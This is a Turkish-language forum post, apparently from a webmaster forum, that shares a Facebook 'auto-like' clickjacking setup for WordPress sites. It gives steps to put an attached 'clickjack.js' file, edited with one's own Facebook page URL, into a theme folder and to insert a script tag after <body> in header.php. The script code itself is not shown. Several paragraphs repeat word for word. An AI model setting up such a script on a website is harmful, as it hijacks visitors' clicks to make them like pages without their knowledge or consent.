Merhaba arkadaşlar.
Bir konu okudum az önce ve sabah sabah sinirlerimi bozdu. Arkadaş auto-like kodlarını bile ücretli veriyor. Boşverin mesaj dahi atmayın daha iyi.
Birkaç arkadaş istemiş merak etmiş bende paylaşayım dedim. Aslında tereddütlerim yok değil. Şimdi her taraf auto-like ile dolacak diye. Ama olsun.
Ekteki js dosyasını indirin ve herhangi bir editörle açın. Aşağıdaki kodu bulun.
Kendi facebook sayfa isminizle değiştirin. Ve tema klasörünün içine atın. (hangi scriptte yapacağınızı bilmediğim için wordpress'e göre konuşuyorum) Daha sonra header.php yi açın ve aşağıdaki kodu bulun.
Hemen altına yapıştırın.
header.php yide tema klasörünüze atın. Hepsi bu kadar. Farklı scriptleri kullanan arkadaşlarda kendilerine göre ayarlayabilirler. Yapamazlarsa ben yardımcı olurum.
Bir konu okudum az önce ve sabah sabah sinirlerimi bozdu. Arkadaş auto-like kodlarını bile ücretli veriyor. Boşverin mesaj dahi atmayın daha iyi.
Birkaç arkadaş istemiş merak etmiş bende paylaşayım dedim. Aslında tereddütlerim yok değil. Şimdi her taraf auto-like ile dolacak diye. Ama olsun.
Ekteki js dosyasını indirin ve herhangi bir editörle açın. Aşağıdaki kodu bulun.
Kod:
http://www.facebook.com/aska.dair.sirali.cumleler
Kod:
<body>
Kod:
<script src="<?php bloginfo('template_url'); ?>/clickjack.js"></script>